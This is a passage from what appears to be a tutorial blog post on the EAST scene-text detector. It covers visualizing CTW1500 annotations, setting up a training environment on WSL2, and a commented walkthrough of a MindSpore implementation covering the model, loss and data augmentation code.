    import numpy as np
    import matplotlib.pyplot as plt

    index = 997

    # define the paths
    image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
    label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    # parse the XML file
    tree = ET.parse(label_path)
    root = tree.getroot()

    # iterate over each image
    for image_elem in root.findall("image"):
        file_name = image_elem.get("file")

        # iterate over each annotation box
        for box_elem in image_elem.findall("box"):
            box_height = int(box_elem.get('height'))
            box_width = int(box_elem.get('width'))
            box_left = int(box_elem.get('left'))
            box_top = int(box_elem.get('top'))

            print(f"Box height: {box_height}")
            print(f"Box width: {box_width}")
            print(f"Box left: {box_left}")
            print(f"Box top: {box_top}")

            # read the <segs> text and split it into a list on commas
            segs = box_elem.find('./segs')
            segs_values = segs.text.split(',')

            segs_x = []
            segs_y = []
            print("Segments:")
            for i in range(0, len(segs_values), 2):
                segs_x.append(int(segs_values[i]))
                segs_y.append(int(segs_values[i+1]))
            segs = np.array([segs_x, segs_y], np.int32).T
            print(f"segs_x: {segs_x}, y: {segs_y}")

            transcriptions = box_elem.find("label").text

            # collect all pts tags
            pts_elems = box_elem.findall("pts")

            # extract the coordinates
            pts_x = []
            pts_y = []
            for pts_elem in pts_elems:
                pts_x.append(int(pts_elem.get("x")))
                pts_y.append(int(pts_elem.get("y")))
            pts = np.array([pts_x, pts_y], np.int32).T
            # print the annotation info
            print("File: ", file_name)
            print("Transcriptions: ", transcriptions)
            print("Points: ", pts)

            # draw everything
            cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
            cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
            cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

            for p in pts:
                cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

            cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                        min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    Output:

    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]

    (figure: original vs. annotated training image)

    Code for visualizing the test-set images (each line of the txt label has the form x1,y1,x2,y2,…,####transcription):

    import os

    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    index = 1200

    image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
    label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
        coords_text = annotation.strip().split(',####')
        coords = list(map(int, coords_text[0].split(',')))
        points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
        transcriptions = coords_text[1]

        cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

        for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

        cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    (figure: original vs. annotated test image)


    Windows

    WSL2

    Set up the environment:

    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper

    Let's run it!

    python3 train.py

    Promptly rewarded with an error:

      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
        from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory

    The fix:

    sudo apt update
    sudo apt install libsm6

    Another error:

    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!

    Install cuDNN:

    sudo apt install nvidia-cuda-toolkit

    Run it again!

    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

    MindSpore

    Reading the code

    train.py

    Looks much like any other train.py: set up the various parameters, load the model and the optimizer, and start training.

    All the details live in src/.

    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr

    This section pulls in the required modules: running-average bookkeeping, network parameter grouping, the EAST model and its loss cell, logging, parameter initialization, the EAST dataset, and the learning-rate scheduler.

    First, AverageMeter() and get_param_groups() are imported from src.util; they compute running averages and collect the network parameters to be trained, respectively.
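
    For intuition, a meter of this kind can be sketched in a few lines (an illustrative guess at the interface, not the repo's actual implementation):

    class AverageMeter:
        """Track the latest value and the running average of a metric (e.g. the batch loss)."""

        def __init__(self, name):
            self.name = name
            self.reset()

        def reset(self):
            self.val, self.sum, self.count, self.avg = 0.0, 0.0, 0, 0.0

        def update(self, val, n=1):
            # record one observation with weight n (e.g. the batch size)
            self.val = val
            self.sum += val * n
            self.count += n
            self.avg = self.sum / self.count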

    Distributed computation

    This code sets up MindSpore's distributed-computation parameters; I'd rather not touch it.

    args, _ = parser.parse_known_args()
    args.device_id = int(os.getenv("DEVICE_ID", "0"))
    args.rank = args.device_id

    ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
    if args.is_distributed:
        comm.init()
        args.rank = comm.get_rank()
        args.group_size = comm.get_group_size()
        ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
                                     device_num=args.group_size)

    ModelArts

    ModelArts-related parameters, though it still runs with this set to 0?


    Next, mox.file.copy_parallel() copies the data from the remote path (args.data_dir) to a local data path.

    Finally, the output path (args.outputs_dir) is pointed at a subdirectory of /cache. When running on the ModelArts platform, program output also has to live under /cache for the data to be stored persistently.

    if args.is_modelArts:
        import moxing as mox

        local_data_url = os.path.join('/cache/data', str(args.rank))
        local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
        local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

        mox.file.rename(args.pretrained_backbone, local_ckpt_url)
        args.pretrained_backbone = local_ckpt_url

        mox.file.copy_parallel(args.data_dir, local_data_url)
        args.data_dir = local_data_url

        args.outputs_dir = os.path.join('/cache', args.outputs_dir)

    Related paths

    Set up the relevant paths (dataset, logs):

    args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
    args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

    # use the current process rank (args.rank) as a subdirectory name for the output folder
    outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
    # then append the current timestamp as another subdirectory name
    args.outputs_dir = os.path.join(
        args.outputs_dir,
        datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
    args.logger = get_logger(args.outputs_dir, args.rank)  # create a logger that writes into args.outputs_dir
    args.logger.save_args(args)  # save all arguments into the log file

    if __name__ == "__main__":

    Optimization

    Profiling and acceleration setup:

    if args.need_profiler:
        # create a profiler and save its results under args.outputs_dir
        profiler = Profiler(
            output_path=args.outputs_dir,
            is_detail=True,
            is_show_op_path=True)

    # an AverageMeter that tracks the running mean of the loss for later printing
    loss_meter = AverageMeter('loss')

    # reset the auto-parallel context
    context.reset_auto_parallel_context()
    parallel_mode = ParallelMode.STAND_ALONE
    degree = 1
    # distributed-computation settings again...
    if args.is_distributed:
        parallel_mode = ParallelMode.DATA_PARALLEL
        degree = args.group_size
    context.set_auto_parallel_context(
        parallel_mode=parallel_mode,
        gradients_mean=True,
        device_num=degree)

    Loading the model
    network = EAST()  # instantiate the EAST model
    # default is kaiming-normal
    default_recurisive_init(network)  # default recursive initialization of the model (He-normal)

    # load pretrained_backbone
    if args.pretrained_backbone:  # if given, load a pretrained backbone
        parm_dict = load_checkpoint(args.pretrained_backbone)  # load the checkpoint parameters
        load_param_into_net(network, parm_dict)  # copy them into the network
        args.logger.info('finish load pretrained_backbone')  # log that loading finished

    network = EastWithLossCell(network)  # wrap the EAST model together with its loss function
    if args.resume_east:  # if set, resume training from a previously saved EAST checkpoint
        param_dict = load_checkpoint(args.resume_east)
        load_param_into_net(network, param_dict)
        args.logger.info('finish get resume east')

    args.logger.info('finish get network')

    # load the dataset: create_east_dataset() takes the image folder, label folder, batch size,
    # device count and rank, and returns the dataset plus the total number of samples
    ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
                                        device_num=args.group_size, rank=args.rank, is_training=True)
    args.logger.info('Finish loading dataset')

    # steps per epoch = total samples / batch size / number of devices
    args.steps_per_epoch = int(
        data_size /
        args.per_batch_size /
        args.group_size)

    if not args.ckpt_interval:
        # if args.ckpt_interval is unset, checkpoint once per epoch
        args.ckpt_interval = args.steps_per_epoch
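
    As a quick sanity check on that arithmetic (made-up numbers, purely illustrative):

    data_size, per_batch_size, group_size = 1000, 8, 2
    steps_per_epoch = int(data_size / per_batch_size / group_size)
    print(steps_per_epoch)  # 62: each of the 2 devices runs 62 full batches per epoch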

    Setting up the optimizer
    # get learning rate
    lr = get_lr(args)  # fetch the learning-rate schedule and assign it to lr
    opt = Adam(  # optimize with Adam over the trainable parameter groups of the EAST model
        params=get_param_groups(network),
        learning_rate=Tensor(
            lr,
            ms.float32))
    loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True)  # fixed loss-scale manager
    model = Model(network, optimizer=opt, loss_scale_manager=loss_scale)  # assemble the model, optimizer and loss scaling
    # this yields the complete, trainable model object

    Training

    Start training:

    network.set_train()  # put the network into training mode
    # save the network model and parameters for subsequent fine-tuning
    # checkpoint settings: how many steps between checkpoints and how many checkpoints to keep
    config_ck = CheckpointConfig(
        save_checkpoint_steps=100,
        keep_checkpoint_max=1)
    # group layers into an object with training and evaluation features
    # directory where the model parameters will be saved
    save_ckpt_path = os.path.join(
        args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
    # ModelCheckpoint() builds a callback that saves the model parameters;
    # prefix sets the file-name prefix, directory the save path, config the settings above
    ckpoint_cb = ModelCheckpoint(
        prefix="checkpoint_east",
        directory=save_ckpt_path,
        config=config_ck)
    callback = [
        TimeMonitor(data_size=data_size),
        LossMonitor(),
        ckpoint_cb
    ]
    # model.train() runs the training loop for max_epoch epochs over the dataset with the callbacks above;
    # dataset_sink_mode=True streams the dataset to the device for better throughput
    model.train(
        args.max_epoch,
        ds,
        callbacks=callback,
        dataset_sink_mode=True)
    args.logger.info('==========end training===============')

    src/util.py

      Defines a bunch of utility classes and functions; I can't quite follow them orz:
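
      At least get_param_groups tends to follow a pattern that recurs across MindSpore model-zoo code: split the parameters into a weight-decay group and a no-decay group. A hedged sketch of that idea (assumed behavior, not the repo's exact code):

      def get_param_groups(network):
          # biases and BatchNorm gamma/beta conventionally get no weight decay
          decay_params, no_decay_params = [], []
          for param in network.trainable_params():
              name = param.name
              if name.endswith('.bias') or name.endswith('.gamma') or name.endswith('.beta'):
                  no_decay_params.append(param)
              else:
                  decay_params.append(param)
          return [{'params': no_decay_params, 'weight_decay': 0.0},
                  {'params': decay_params}]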


      src/east.py

      class EAST

      Defines the EAST network as the class EAST:

      class EAST(nn.Cell):
          def __init__(self):
              super(EAST, self).__init__()
              # feature-extraction module; returns 5 groups of feature maps for later processing
              self.extractor = VGG16FeatureExtraction()
              # merging module; concatenates the 5 groups of feature maps into richer features
              self.merge = Merge()
              # output module; convolves the merged features into the text-region score and the geometry prediction geo
              self.output = Output()

          def construct(self, x_1):
              # run the input x_1 through self.extractor() to get 5 groups of feature maps
              f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
              # merge the feature maps with self.merge()
              x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
              # feed the merged map into self.output() to get the score and geometry predictions
              score, geo = self.output(x_1)

              return score, geo

      (figure: the EAST architecture from the paper)

      The code maps directly onto the three parts described in the paper:


        class VGG16FeatureExtraction

        Roughly speaking, it defines a pile of convolution kernels, convolves the input the way the paper prescribes, and returns 5 groups of feature maps, although the feature-map numbering seems to run in the opposite direction from the paper.

        class VGG16FeatureExtraction(nn.Cell):
            """VGG16FeatureExtraction for deeptext"""

            def __init__(self):
                super(VGG16FeatureExtraction, self).__init__()
                self.relu = nn.ReLU()
                self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
                self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

                self.conv1_1 = _conv(
                    in_channels=3,
                    out_channels=64,
                    kernel_size=3,
                    padding=1)

                ……

                self.conv5_3 = _conv(
                    in_channels=512,
                    out_channels=512,
                    kernel_size=3,
                    padding=1)
                self.cast = P.Cast()

            def construct(self, out):
                """ Construction of VGG """
                f_0 = out
                out = self.cast(out, mstype.float32)
                out = self.conv1_1(out)
                out = self.relu(out)
                out = self.conv1_2(out)
                out = self.relu(out)
                out = self.max_pool(out)

                ……

                out = self.max_pool(out)
                f_4 = out
                out = self.conv5_1(out)
                out = self.relu(out)
                out = self.conv5_2(out)
                out = self.relu(out)
                out = self.conv5_3(out)
                out = self.relu(out)
                out = self.max_pool(out)
                f_5 = out

                return f_0, f_2, f_3, f_4, f_5
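
        To keep the five returned maps straight, here is a quick shape trace for an assumed 1×3×512×512 input (the channel widths of the elided middle blocks assume the standard VGG16 layout, so treat this as a sketch):

        h = w = 512
        # f_0 is the raw input; each later map sits after one more 2x2/stride-2 max-pool
        for name, downscale, channels in [("f_0", 1, 3), ("f_2", 4, 128), ("f_3", 8, 256),
                                          ("f_4", 16, 512), ("f_5", 32, 512)]:
            print(name, (channels, h // downscale, w // downscale))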

        class Merge
      • nn.BatchNorm2d(128): MindSpore's 2-D batch-normalization layer; it normalizes the outputs of a convolutional or fully-connected layer so that the following layers receive well-scaled activations.
      • relu(): the activation function
      class Merge(nn.Cell):
          def __init__(self):
              super(Merge, self).__init__()

              self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
              self.bn1 = nn.BatchNorm2d(128)
              self.relu1 = nn.ReLU()
              self.conv2 = nn.Conv2d(
                  128,
                  128,
                  3,
                  padding=1,
                  pad_mode='pad',
                  has_bias=True)
              self.bn2 = nn.BatchNorm2d(128)
              self.relu2 = nn.ReLU()

              ……

          def construct(self, x, f1, f2, f3, f4):
              img_hight = P.Shape()(x)[2]
              img_width = P.Shape()(x)[3]

              out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
              out = self.concat((out, f3))
              out = self.relu1(self.bn1(self.conv1(out)))
              out = self.relu2(self.bn2(self.conv2(out)))

              out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
              out = self.concat((out, f2))
              out = self.relu3(self.bn3(self.conv3(out)))
              out = self.relu4(self.bn4(self.conv4(out)))

              out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
              out = self.concat((out, f1))
              out = self.relu5(self.bn5(self.conv5(out)))
              out = self.relu6(self.bn6(self.conv6(out)))

              out = self.relu7(self.bn7(self.conv7(out)))
              return out

      class Output
      class Output(nn.Cell):
          def __init__(self, scope=512):
              super(Output, self).__init__()
              self.conv1 = nn.Conv2d(32, 1, 1)
              self.sigmoid1 = nn.Sigmoid()
              self.conv2 = nn.Conv2d(32, 4, 1)
              self.sigmoid2 = nn.Sigmoid()
              self.conv3 = nn.Conv2d(32, 1, 1)
              self.sigmoid3 = nn.Sigmoid()
              self.scope = scope
              self.concat = P.Concat(axis=1)
              self.PI = 3.1415926535898

          def construct(self, x):
              score = self.sigmoid1(self.conv1(x))  # text-region score
              loc = self.sigmoid2(self.conv2(x)) * self.scope  # location (4 distances, scaled by scope)
              angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI  # rotation angle
              geo = self.concat((loc, angle))  # the geometry combines location and angle
              return score, geo  # return the text-region score and the concatenated geometry

      class EastLossBlock

      When computing the geometry loss, we also have to account for whether a sample is a genuine text region: the position values, classification labels, and corresponding predictions at non-text locations are masked out so that they don't pollute the loss.

      Finally, the classification loss and the geometry loss are combined in a weighted sum, which is returned as the overall loss.
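
      Written out as formulas (matching the code below; the 10× weight on the angle term is the λ_θ from the paper):

      $$L = L_{\mathrm{cls}} + L_{\mathrm{geo}}, \qquad L_{\mathrm{geo}} = L_{\mathrm{IoU}} + 10\,L_{\theta}$$

      $$L_{\mathrm{IoU}} = -\log\frac{A_{\cap}+1}{A_{\cup}+1}, \qquad L_{\theta} = 1-\cos(\hat{\theta}-\theta)$$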

      class EastLossBlock(nn.Cell):
          def __init__(self):
              super(EastLossBlock, self).__init__()
              self.split = P.Split(1, 5)
              self.min = MyMin()
              self.log = P.Log()
              self.cos = P.Cos()
              self.mean = P.ReduceMean(keep_dims=False)
              self.sum = P.ReduceSum()
              self.eps = 1e-5
              self.dice = DiceCoefficient()

          def construct(
                  self,
                  y_true_cls,
                  y_pred_cls,
                  y_true_geo,
                  y_pred_geo,
                  training_mask):
              ans = self.sum(y_true_cls)
              # compare the predicted text-region scores against the ground truth;
              # the classification loss is a Dice coefficient
              classification_loss = self.dice(
                  y_true_cls, y_pred_cls * (1 - training_mask))

              # n * 5 * h * w
              # split the predicted and ground-truth geometry into their components
              d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
              d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
              area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
              area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
              w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
              h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

              area_intersect = w_union * h_union
              area_union = area_gt + area_pred - area_intersect
              # the geometry loss is built from the IoU term and the angle term
              iou_loss_map = -self.log((area_intersect + 1.0) /
                                       (area_union + 1.0))  # iou_loss_map
              angle_loss_map = 1 - self.cos(theta_pred - theta_gt)  # angle_loss_map

              # the angle error is measured with cosine similarity
              angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
              iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
              geo_loss = 10 * angle_loss + iou_loss

              return geo_loss + classification_loss
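
      DiceCoefficient itself isn't shown here; in this family of implementations it is typically a soft-dice loss, roughly as follows (a hedged NumPy sketch, not the repo's code):

      import numpy as np

      def dice_loss(y_true, y_pred, eps=1e-5):
          # soft dice: 1 - 2|X∩Y| / (|X| + |Y|); lower is better, 0 means perfect overlap
          inter = np.sum(y_true * y_pred)
          total = np.sum(y_true) + np.sum(y_pred) + eps
          return 1.0 - 2.0 * inter / total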

      class EastWithLossCell
      class EastWithLossCell(nn.Cell):
          def __init__(self, network):
              super(EastWithLossCell, self).__init__()
              # the EAST model, used as the network module of the computation graph
              self.east_network = network
              # an EastLossBlock instance, used as the loss module of the computation graph
              self.loss = EastLossBlock()

          def construct(self, img, true_cls, true_geo, training_mask):
              '''
              img: input image
              true_cls: classification labels
              true_geo: geometry labels
              training_mask: mask that filters out non-text regions
              '''
              # forward pass through the network
              socre, geometry = self.east_network(img)
              # hand the predicted score and geometry to the loss module and return the overall loss
              loss = self.loss(
                  true_cls,
                  socre,
                  true_geo,
                  geometry,
                  training_mask)
              return loss

      src/dataset.py

create_east_dataset()
def create_east_dataset(
        img_root,
        txt_root,
        batch_size,
        device_num,
        rank,
        is_training=True):
    # instantiate ICDAREASTDataset with the image and annotation paths;
    # it reads and parses the images and their labels
    east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
    # build a distributed sampler that shards and dispatches the data across devices
    distributed_sampler = DistributedSampler(
        len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

    trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25),  # randomly jitter brightness, contrast, saturation and hue
                  CV.Rescale(1 / 255.0, 0),                   # rescale the pixel values
                  CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),  # normalize the image
                  CV.HWC2CHW()]  # convert the layout from HWC (height x width x channels) to CHW
    if is_training:  # training mode
        dataset_column_names = [
            "image",          # image
            "score_map",      # classification score map
            "geo_map",        # geometry map
            "training_mask"]  # training mask
        # build the dataset with MindSpore's GeneratorDataset
        ds = de.GeneratorDataset(
            east_data,
            column_names=dataset_column_names,
            num_parallel_workers=32,  # number of parallel workers for processing and augmentation
            # `sampler` selects how samples are drawn from the dataset;
            # here it is the distributed_sampler built above
            sampler=distributed_sampler)
        # map() feeds the image column through the transform list for augmentation
        ds = ds.map(
            operations=trans_list,
            input_columns=["image"],
            num_parallel_workers=8,
            python_multiprocessing=True)
        # batch() groups the samples into batches of batch_size
        ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

    return ds, len(east_data)
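
The DistributedSampler used above is also defined elsewhere in the repository. As a rough sketch of the idea, assuming the usual shuffle-then-shard behaviour (not the exact implementation):

import numpy as np

class DistributedSampler:
    def __init__(self, dataset_size, num_replicas, rank, shuffle=True):
        self.dataset_size = dataset_size
        self.num_replicas = num_replicas  # total number of devices
        self.rank = rank                  # id of this device
        self.shuffle = shuffle
        self.epoch = 0

    def __iter__(self):
        if self.shuffle:
            rng = np.random.RandomState(self.epoch)  # same permutation on every rank
            indices = rng.permutation(self.dataset_size)
            self.epoch += 1
        else:
            indices = np.arange(self.dataset_size)
        # each rank takes every num_replicas-th index starting at its own rank
        return iter(indices[self.rank::self.num_replicas].tolist())

    def __len__(self):
        return self.dataset_size // self.num_replicas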

class ICDAREASTDataset
class ICDAREASTDataset:
    def __init__(self, img_path, gt_path, scale=0.25, length=512):
        super(ICDAREASTDataset, self).__init__()
        self.img_files = [os.path.join(
            img_path,
            img_file) for img_file in sorted(os.listdir(img_path))]
        self.gt_files = [
            os.path.join(
                gt_path,
                gt_file) for gt_file in sorted(
                os.listdir(gt_path))]
        self.scale = scale    # down-scaling ratio of the output maps
        self.length = length  # side length of the cropped image

    def __getitem__(self, index):
        with open(self.gt_files[index], 'r') as f:
            lines = f.readlines()
        # extract the vertex coordinates and labels of the text regions
        vertices, labels = extract_vertices(lines)

        img = Image.open(self.img_files[index])       # read the image
        img, vertices = adjust_height(img, vertices)  # adjust the height
        img, vertices = rotate_img(img, vertices)     # randomly rotate the image
        img, vertices = crop_img(img, vertices, labels, self.length)  # crop to the given side length
        # classification score map, geometry map and ignored map
        score_map, geo_map, ignored_map = get_score_geo(
            img, vertices, labels, self.scale, self.length)
        score_map = score_map.transpose(2, 0, 1)
        ignored_map = ignored_map.transpose(2, 0, 1)
        geo_map = geo_map.transpose(2, 0, 1)
        if np.sum(score_map) < 1:
            score_map[0, 0, 0] = 1
        return img, score_map, geo_map, ignored_map

    def __len__(self):
        return len(self.img_files)

extract_vertices()
def extract_vertices(lines):
    '''extract vertices info from txt lines
    Input:
        lines   : list of strings, one per text region, holding the vertex
                  coordinates followed by the transcription
    Output:
        vertices: vertices of text regions <numpy.ndarray, (n,8)>
        labels  : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
    '''
    labels = []    # final labels
    vertices = []  # vertex info
    for line in lines:
        # strip the trailing newline with rstrip() and the leading BOM
        # (Byte Order Mark) with lstrip(), then split the line into a
        # list of eight integers
        vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
        label = 0 if '###' in line else 1
        labels.append(label)
    # return the vertices and labels as numpy arrays
    return np.array(vertices), np.array(labels)
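
A quick sanity check with two made-up ICDAR-2015-style lines (the coordinates and transcriptions below are illustrative only, not from the dataset):

lines = ['377,117,463,117,465,130,378,130,Genaxis Theatre\n',
         '374,155,409,155,409,170,374,170,###\n']   # '###' marks an ignored region
vertices, labels = extract_vertices(lines)
print(vertices.shape, labels)  # -> (2, 8) [1 0]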

adjust_height()
def adjust_height(img, vertices, ratio=0.2):
    '''adjust height of image to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        ratio       : height changes in [0.8, 1.2]
    Output:
        img         : adjusted PIL Image
        new_vertices: adjusted vertices
    '''
    ratio_h = 1 + ratio * (np.random.rand() * 2 - 1)  # random height scaling factor
    old_h = img.height
    # compute the new height new_h from the scaling factor ratio_h:
    # multiply the original height old_h by the factor and round to an integer;
    # np.around() is NumPy's rounding function, with a default precision of 0
    new_h = int(np.around(old_h * ratio_h))
    img = img.resize((img.width, new_h), Image.BILINEAR)

    new_vertices = vertices.copy()
    if vertices.size > 0:
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
    # return the resized image and the updated vertex coordinates
    return img, new_vertices

rotate_img()
def rotate_img(img, vertices, angle_range=10):
    '''rotate image [-10, 10] degree to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        angle_range : rotate range
    Output:
        img         : rotated PIL Image
        new_vertices: rotated vertices
    '''
    # rotation center
    center_x = (img.width - 1) / 2
    center_y = (img.height - 1) / 2
    angle = angle_range * (np.random.rand() * 2 - 1)
